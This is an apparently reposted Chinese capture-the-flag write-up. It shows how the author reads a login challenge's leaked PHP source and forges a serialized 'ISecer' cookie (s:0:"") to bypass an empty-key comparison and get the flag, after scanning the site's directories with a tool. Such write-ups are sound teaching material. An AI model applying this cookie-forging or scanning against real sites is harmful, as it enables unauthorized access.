点了login咋没反应
提示:hint
fuzz
打开发现是个登录页面,点击login没反应,看了源码,action="#"
拿御剑扫一下,扫出来一堆目录
打开看了下,都不是题目环境,虽然手痒还是忍一下 = =
想到了提示hint
访问/flagphp/?hint
,返回源码(截取了php部分)
<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE[‘ISecer‘];
if(isset($_GET[‘hint‘])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
?>
<?php
}
$KEY=‘ISecer:www.isecer.com‘;
?>
要拿到flag,需要构造cookie,使得cookie的ISecer
字段反序列化之后等于""
这里需要注意,上下是两部分代码,所以并不是$KEY=‘ISecer:www.isecer.com‘
构造cookie:ISecer=s:0:""
,尝试了一下ISecer=s:0:"";
和ISecer=s:0:""%3b
也可以
原文:https://www.cnblogs.com/R3col/p/13174603.html